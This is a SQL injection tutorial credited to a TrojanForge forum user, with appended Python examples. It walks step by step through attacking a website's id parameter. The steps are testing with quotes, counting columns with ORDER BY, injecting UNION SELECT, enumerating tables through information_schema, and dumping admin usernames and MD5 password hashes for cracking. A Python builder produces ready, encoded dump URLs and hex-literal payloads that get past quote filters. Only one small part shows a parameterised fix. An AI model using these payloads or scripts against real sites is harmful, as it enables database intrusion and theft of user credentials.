Published by: anon_440252992 on Dec 02, 2012
Copyright: Attribution Non-commercial
SQL Injection Tutorial
by SlixMe@TrojanForge.com
Contact : SlixMe [ at ] jabber.ru
################1. What is SQLi ?################
 SQL injection is one of the most common attacks on websites. It is done by injecting SQL commands into the query that a web application sends to its database (MySQL in this tutorial), most often to read the users' or administrators' password hashes. The vulnerability exists when user input is placed into an SQL statement without being correctly filtered for string-literal escape characters, or when the input is not strongly typed (a numeric parameter such as id is accepted as arbitrary text) and is unexpectedly executed as part of the statement. SQL commands are thus injected from the web form or URL into the application's database query, where they run with the application's database privileges and can change the database content or dump the database information.
################1. Checking vulnerability.################
 There are many ways to check for the vulnerability; here are some test strings:
Code:
'
+and+1=1
'+or+'1'='1
+OR+'x'='x   (x = anything)
So let's take the simplest string, a single quote, and add it to the end of the URL, for example:
Code:
http://example.com/article.php?id=4123'

If the site is vulnerable you should see a change. Usually that is a database error, but not always: the application may hide errors, and the only symptom may be missing content (images, text, or the whole page). A good way to confirm is to compare id=4123+and+1=1, which should render the page normally, with id=4123+and+1=2, which should not.
################2. Getting Columns.################
 It's pretty simple to find out how many columns the application's query returns: we use ORDER BY with a column position. ORDER BY n succeeds as long as n is not larger than the number of columns, and fails as soon as it is. Here is an example on our test site:
Code:
http://example.com/article.php?id=4123+order+by+1--

After order+by+1-- our website opens normally, so let's keep increasing the position until we get some change on the website:
Code:
http://example.com/article.php?id=4123+order+by+2--

Code:
http://example.com/article.php?id=4123+order+by+3--

Code:
http://example.com/article.php?id=4123+order+by+4--

Code:
http://example.com/article.php?id=4123+order+by+5--

Code:
http://example.com/article.php?id=4123+order+by+6--

Code:
http://example.com/article.php?id=4123+order+by+7--

Let's say on order+by+7-- we get some change, for example an error or some content missing. ORDER BY 6 was the last one that worked, so we now know the query returns 6 columns. The next step is the UNION command.

A note on the trailing --: MySQL only treats -- as a comment when it is followed by whitespace, so in a URL write --+ (the + decodes to a space) or -- -; a bare -- at the very end of the query can itself cause a syntax error.
################3. UNION Command.################
 The UNION command lets us attach our own SELECT to the application's query and so gather data from a table of our choosing, for example:
UNION SELECT column_name(s) FROM table_name2
Our SELECT has to return the same number of columns as the original query (6 in our example), so the union on our example would look like this:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,5,6--

Now one of the numbers should be displayed somewhere on the page. That is the visible column, and we will use it to get all the other information we need. In some cases none of the numbers is shown, because the page only renders the first row of the result and that is still the original article. There are two tricks for that. The first is to make the original row disappear by adding - after id= (id=-4123): no article has a negative id, so the UNION row becomes the first row. The second is to add a condition that is always false before the union, such as +and+1=2, which has the same effect. Then our example would look like this:
1.Code:
http://example.com/article.php?id=-4123+union+all+select+1,2,3,4,5,6--
2.Code:
http://example.com/article.php?id=4123+and+1=2+union+all+select+1,2,3,4,5,6--
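The three steps above (the quote test, the ORDER BY column count and the UNION with a negated id), as an added example that is not part of the original tutorial: a miniature article.php rebuilt in Python on an in-memory SQLite database, with a parameterised handler beside it for contrast. The table layout, the sample rows and the use of SQLite (which has || instead of CONCAT and no information_schema) are assumptions made for this demo.

```python
# Added example, not from the original tutorial: a miniature article.php
# rebuilt in Python on SQLite so the quote test, the ORDER BY column count
# and the UNION trick can be run offline. Schema, rows and column layout
# are constructed for this demo.
import sqlite3

# Constructed sample data. The hash is MD5("admin"), the same value the
# tutorial shows in its output.
ARTICLE_ROWS = [(4123, "Hello", "Body text", "slix", "2012-12-02", 1)]
ADMIN_ROWS = [("admin", "21232f297a57a5a743894a0e4a801fc3")]

SELECT_ARTICLE = ("select id, title, body, author, posted, published "
                  "from articles where id=")


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("create table articles(id integer, title text, body text, "
               "author text, posted text, published integer)")
    db.executemany("insert into articles values(?,?,?,?,?,?)", ARTICLE_ROWS)
    db.execute("create table admin(username text, password text)")
    db.executemany("insert into admin values(?,?)", ADMIN_ROWS)
    return db


def article_vulnerable(db, id_param):
    """The bug the tutorial exploits: the raw ?id= value is glued into the SQL."""
    return db.execute(SELECT_ARTICLE + id_param).fetchall()


def article_safe(db, id_param):
    """Hardened form: the value is bound as a parameter, never parsed as SQL."""
    return db.execute(SELECT_ARTICLE + "?", (id_param,)).fetchall()


def looks_injectable(db):
    """Step 1: a stray quote breaks the statement, so the database errors."""
    try:
        article_vulnerable(db, "4123'")
    except sqlite3.DatabaseError:
        return True
    return False


def count_columns(db, max_cols=20):
    """Step 2: raise ORDER BY n until the database complains that the position
    is out of range; the last n that worked is the column count."""
    for n in range(1, max_cols + 1):
        try:
            article_vulnerable(db, f"4123 order by {n}--")
        except sqlite3.DatabaseError:
            return n - 1
    return None


def union_leak(db, ncols, visible_col, expr, from_clause=""):
    """Step 3: negate the id so the application's own row is not returned and
    the UNION row is the first (and only) row, then read `expr` from the
    visible column. `expr` is SQLite syntax: a || b where MySQL has concat."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[visible_col - 1] = expr
    payload = f"-4123 union all select {','.join(cols)} {from_clause}--"
    rows = article_vulnerable(db, payload)
    return rows[0][visible_col - 1] if rows else None


if __name__ == "__main__":
    db = make_db()
    print("injectable:", looks_injectable(db))        # True
    n = count_columns(db)
    print("columns:", n)                               # 6
    leak = union_leak(db, n, 5, "username || ':' || password", "from admin")
    print("leaked:", leak)                             # admin:21232f...
    # The same payload against the hardened handler matches no row at all.
    print("safe:", article_safe(db, "-4123 union all select 1,2,3,4,5,6--"))  # []
```

The safe handler is the fix: because the id is bound as a value, the whole payload is compared against the id column as one string and simply matches nothing, so neither ORDER BY nor UNION ever reaches the parser.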
################4. MySQL Version.################
 After getting a valid (visible) column it's time to check our MySQL version. Put version() in the visible column and the page will display the version of MySQL. Let's say the visible column in our example is 5:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,version(),6--
You should also check:
Code:
version()  - displays the MySQL version
user()     - displays the MySQL user the application connects as
database() - displays the database currently in use
What matters for the next step is whether the server is MySQL 4 or MySQL 5: MySQL 5.0 and later expose the schema through information_schema, MySQL 4 does not.
################5. Table_name & Column_name################
 This step is closely connected to the previous one: if you got MySQL version 4 you have to guess the table and column names. Add a FROM clause to the union:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,5,6+from+Table--
With a guess of admin the example would look like this:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,5,6+from+admin--
I provided the most used table names in the next file:
Code:
http://pastebin.com/raw.php?i=pGUVF8rz
If you get an error, or content goes missing, you got the wrong table; if there is no error and the page displays the same as before, you got it right. The next step is to get the columns: replace the number in the visible column with a column name.
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,username,6+from+admin--
Getting columns is the same procedure: if you got the name right you should see the username of some user, if not you get an error and have to guess another column name. Let's say you got the right columns, username and password. I've provided the most used column names here:
Code:
http://pastebin.com/raw.php?i=QriucXqg
Let's get both in one statement using CONCAT, which combines two or more columns into one string (the visible column can only show one value). Our injection on table admin with the columns username and password would look like this:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,concat(column1,column2),6+from+admin--
Now that we know the two column names, let's concat them:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,concat(username,password),6+from+admin--
CONCAT puts nothing between its arguments, so the output of this injection is the two values run together:
Code:
admin21232f297a57a5a743894a0e4a801fc3
The password is an MD5 hash (this one is the MD5 of the string admin); I guess you know how to crack them. To put a separator between the columns, use a hex literal. Find the hex value of the symbol you want, for example at:
Code:
http://www.ascii.cl/htmlcodes.htm
The hex value of ":" is 3A. In MySQL a hex literal is written with 0x in front of the hex value, so in our case it would look like this:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,concat(username,0x3a,password),6+from+admin--
The output would look like:
Code:
admin:21232f297a57a5a743894a0e4a801fc3
Now let's get back to MySQL version 5. This version is the one mostly used nowadays, and it gives the attacker more options. Getting tables in MySQL 5 is much easier: we use group_concat, or plain concat with LIMIT to read one row at a time, from information_schema. information_schema is an ANSI-standard set of read-only views which provide information about all of the tables, views, columns and procedures in a database. It can be used as a source of the information which some databases only make available through non-standard commands. An example of gathering table names from information_schema is:
Code:
http://example.com/article.php?id=4123+union+all+select+1,2,3,4,group_concat(table_name),6+from+information_schema.tables--
Two caveats: without a WHERE clause this lists every table on the server, including the system schemas, so add +where+table_schema=database() to restrict it to the application's own database; and group_concat cuts its result off at group_concat_max_len (1024 bytes by default), so on a large schema use LIMIT to page through the rows instead.
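The MySQL 5 enumeration chain (table names, then column names, then a group_concat/CONCAT dump with the 0x3a separator), as an added example that is not part of the original tutorial: a small Python payload builder that assembles the injected SELECT and URL-encodes it the way this tutorial's URLs are written. It goes one step beyond the page by also writing table names as 0x.. hex literals: MySQL reads a hex literal as a string, so the payload needs no quote characters at all, which helps when quotes are filtered. The base URL, the column count of 6, visible column 5 and the admin table come from the tutorial; the information_schema.columns query and the -- - comment terminator are additions. Nothing is sent anywhere, the script only builds and prints the URLs.

```python
# Added example, not from the original tutorial: builds the MySQL 5
# information_schema payloads for the injection above. Nothing is sent;
# the base URL and column positions come from the tutorial, the hex-literal
# trick and the columns query are additions.
from urllib.parse import quote_plus

BASE = "http://example.com/article.php?id="   # the tutorial's test URL
NCOLS = 6     # from the ORDER BY step
VISIBLE = 5   # the column echoed on the page


def mysql_hex(s):
    """'admin' -> '0x61646d696e'. MySQL treats a hex literal as a string, so a
    table name or a separator can be written without quote characters."""
    return "0x" + s.encode("utf-8").hex()


def from_mysql_hex(lit):
    """Reverse of mysql_hex, handy for reading values like 0x3a back."""
    return bytes.fromhex(lit[2:]).decode("utf-8")


def union_payload(expr, from_clause="", where=""):
    """UNION ALL SELECT with `expr` in the visible column and the id negated so
    that only the UNION row is rendered."""
    cols = [str(i) for i in range(1, NCOLS + 1)]
    cols[VISIBLE - 1] = expr
    sql = f"-4123 union all select {','.join(cols)}"
    if from_clause:
        sql += f" from {from_clause}"
    if where:
        sql += f" where {where}"
    # MySQL only honours '--' when whitespace follows it; '-- -' keeps that
    # space even if a client trims the end of the URL.
    return sql + " -- -"


def tables_payload():
    """Table names of the database the application uses, not the whole server."""
    return union_payload("group_concat(table_name)",
                         "information_schema.tables",
                         "table_schema=database()")


def columns_payload(table):
    """Column names of one table; the table name is a hex literal, so no quotes."""
    return union_payload("group_concat(column_name)",
                         "information_schema.columns",
                         f"table_name={mysql_hex(table)}")


def dump_payload(table, *columns):
    """All rows of `table`, each row as col1:col2:... (0x3a is ':'); rows are
    joined by group_concat's default comma, up to group_concat_max_len."""
    joined = ",0x3a,".join(columns)
    return union_payload(f"group_concat(concat({joined}))", table)


def as_url(payload):
    """Encode like the tutorial's URLs: spaces become '+', SQL punctuation stays."""
    return BASE + quote_plus(payload, safe="(),=*")


if __name__ == "__main__":
    for p in (tables_payload(), columns_payload("admin"),
              dump_payload("admin", "username", "password")):
        print(as_url(p))
```

The three payloads are meant to be used in that order: the table list tells you which name to feed into columns_payload, and its output tells you which columns to pass to dump_payload.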